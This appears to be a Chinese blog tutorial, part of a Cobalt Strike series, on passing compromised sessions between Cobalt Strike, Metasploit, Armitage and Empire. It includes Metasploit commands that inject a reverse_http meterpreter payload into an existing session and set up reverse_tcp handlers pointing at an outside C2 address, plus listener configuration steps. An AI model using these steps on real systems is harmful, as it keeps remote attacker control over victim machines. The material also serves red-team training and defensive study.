Cobaltstrike系列教程(十二)CS与MSF,Armitage,Empire会话互转

0x00-前文

有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660,需要代码审计、渗透测试、红蓝对抗网络安全相关业务可以看置顶博文

2000人网络安全交流群,欢迎大佬们来玩
群号820783253

Cobaltstrike系列教程(一)简介与安装
https://bbs.ichunqiu.com/thread-52937-1-1.html
Cobaltstrike系列教程(二)Listner与Payload生成
https://bbs.ichunqiu.com/thread-52982-1-1.html
Cobaltstrike系列教程(三)beacon详解
https://bbs.ichunqiu.com/thread-52994-1-1.html
Cobaltstrike系列教程(四)菜单栏与视图
https://bbs.ichunqiu.com/thread-52997-1-1.html
Cobaltstrike系列教程(五)凭据导出
https://bbs.ichunqiu.com/thread-53001-1-1.html
Cobaltstrike系列教程(六)文件/进程管理与键盘记录
https://bbs.ichunqiu.com/thread-53003-1-1.html
Cobaltstrike系列教程(七)端口扫描与Net View
https://bbs.ichunqiu.com/thread-53012-1-1.html
Cobaltstrike系列教程(八)截图与浏览器代理
https://bbs.ichunqiu.com/thread-53013-1-1.html
Cobaltstrike系列教程(九)内置Socks与神器EW
https://bbs.ichunqiu.com/thread-53014-1-1.html
Cobaltstrike系列教程(十)安装扩展
https://bbs.ichunqiu.com/thread-53015-1-1.html
Cobaltstrike系列教程(十一)提权与横向移动
https://bbs.ichunqiu.com/thread-53043-1-1.html

0x001-Cobaltstrike与MSF会话互转

①Metasploit派生shell给Cobaltstrike

首先,你需要拿到一个metepreter会话,本例中session为1
Cobaltstrike的teamserver的ip为8.8.8.8,http监听器端口为4555

msf exploit(handler) >  use exploit/windows/local/payload_inject
msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 8.8.8.8.
msf exploit(payload_inject) > set LPORT 4555
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit

如图Cobaltstrike成功上线
e8Qn4H.png

②Cobalt strike 派生 shell 给 MSF(前提有个beacon shell)

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 8.8.8.8
lhost => 8.8.8.8
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit

然后在cobaltstrike中创建一个windows/foreign/reverse_tcp Listener
,并根据metasploit监听配置cobaltstrike的listener
e8QVHO.png

选择要派生的beacon,右键-->增加会话,选择刚刚配置的foreign监听器
e8QEDK.png

MSF即可成功收到会话
e8QAu6.png

0x002-Cobaltstrike与Armitage会话互转

①Cobaltstrike派生shell给Armitage

首先在armitage中配置一个handler,注意:payload要与cobaltstrike的foreign监听器的协议相同,不然收不到会话。
e8Qlvt.png
同样使用刚刚讲过的cobaltstrike派生会话功能,armitage即可收到shell
e8Q3KP.png

Armitage派生shell给cobaltstrike

选择armitage中的会话,右键,Access-->Pss Session
e8QeED.png
随后配置相关信息为cobaltstrike http监听器的ip和端口
e8QmUe.png
Cobaltstrike即可收到会话

0x003-Cobaltstrike与Empire会话互转

首先如图,在empire中配置好相关的http协议监听器
e8QKCd.png
在cobaltstrike里面添加一个foreign监听器,协议为http
e8QM8A.png
随后使用cobaltstrike中讲过的“增加会话”功能,选择该http监听器,empire即可成功收到会话。

posted @ 2021-12-20 21:04  J0o1ey  阅读(204)  评论(0编辑  收藏  举报